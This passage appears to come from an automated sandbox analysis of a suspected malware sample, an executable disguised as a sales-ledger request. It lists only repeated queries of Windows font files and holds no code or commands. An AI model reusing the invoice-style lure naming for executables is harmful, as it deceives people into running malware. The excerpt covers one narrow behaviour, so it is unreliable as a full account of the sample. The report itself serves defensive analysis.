Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
